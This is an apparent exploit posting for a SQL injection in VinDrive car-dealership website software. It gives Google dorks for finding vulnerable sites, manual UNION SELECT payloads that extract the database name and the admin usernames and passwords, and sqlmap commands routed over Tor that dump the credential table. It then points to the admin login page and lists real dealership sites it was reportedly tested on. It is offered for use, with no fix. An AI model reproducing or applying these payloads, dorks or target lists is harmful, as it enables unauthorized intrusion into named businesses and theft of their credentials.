VinDrive SQL Injecti0n Vulnerability - Manually AND sqlmap
Posted on 30 November -0001
<HTML><HEAD><TITLE>VinDrive SQL Injecti0n Vulnerability - Manually AND sqlmap</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>########################## # Exploit Title: VinDrive SQL Injecti0n Vulnerability - Manually AND sqlmap # Google Dork 1: " allinurl:search/make_offer_form.php?id= " # Google Dork 2: " VinDrive inurl:/search/results.php " # Google Dork 3: " inurl:results.php?_s_col= # Script Name: VinDrive - Vehicle Marketing System - Dealership website www.dealerwebsites.com # Data: 12-09-2016 # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # Tested on : Windows ########################## ######[ Exploit ]###### (( Manually )) To See /column numbers : ( GONNA BE 3,4,5 <-- ) make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 To See /Database Name : ( Database Name will be : dealer62_XXX( SOMENAME ) make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 To See /Admin Username and Password : ( Replace XXXX with the name of data ) make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from dealer62_XXXX.cars_dealers ----------- DONE ------------- ######[ Exploit ]###### (( SQLMAP )) sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor --dbs sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -D dealer62_XXXX --tables -T cars_dealers -C username,password --dump ----------- DONE ------------- ADMIN PAGE : http://www.TarGet/search/admin/ Enjoy ! tested on : http://www.abcmotors.com/search/admin/ http://www.spacecoastauto.com/search/admin/ www.jclautos.com/search/admin/ www.fcautoconnection.com/search/admin/ http://www.greatlittlecars.com/search/admin/ http://www.sunshine-automotive.com/search/admin/ ################################### #Thanks to : MR.Khatar || ll_azab-siyah_ll || Blackwolf_Iran ||Ormazd ||Sh@d0w ||mohammad Pn ||Shdmehr || And All Of Iranian Anonymous . # Discovered By: Hacker Khan</BODY></HTML>
